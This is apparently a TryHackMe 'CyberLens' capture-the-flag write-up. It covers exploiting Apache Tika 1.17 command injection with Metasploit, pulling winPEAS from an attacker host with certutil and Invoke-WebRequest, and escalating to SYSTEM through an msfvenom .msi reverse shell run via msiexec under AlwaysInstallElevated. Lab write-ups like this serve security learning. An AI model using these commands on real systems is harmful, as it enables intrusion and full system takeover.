# THM-CyberLens    Scrolling down the web page we can see a file upload.  I checked the source code to see how it works but stumbled into something interesting.  You can see there is another website on port 61777.  It’s running [Apache Tika 1.17](https://www.exploit-db.com/exploits/47208). A quick search on google reveals that this version is vulnerable to command injection. I use metasploit to get shell    I use shell to create cmd   I upload winpeas to target machine ``` certutil -urlcache -f http://10.6.4.204:1234/winPEAS.exe winpeas.exe Invoke-WebRequest -Uri http://10.6.4.204:1234/winPEAS.exe -OutFile winpeas.exe ```    I find an interesting result is AlwaysInstallElevated. AlwaysInstallElevated is a setting in Windows policy that permits the Windows Installer packages (.msi files) to be installed with administrative privileges.  Lets check about it in internet, i find [this blog](https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/) have method to root I use msfvenom to create .msi file to make revshell  I upload file to target machine   After upload file, i run command `msiexec /quiet /qn /i ignite.msi` to execute the file ignite.msi and make sure use nc to catch the revshell  I have gained SYSTEM privileges on the target, meaning now i can do anything i want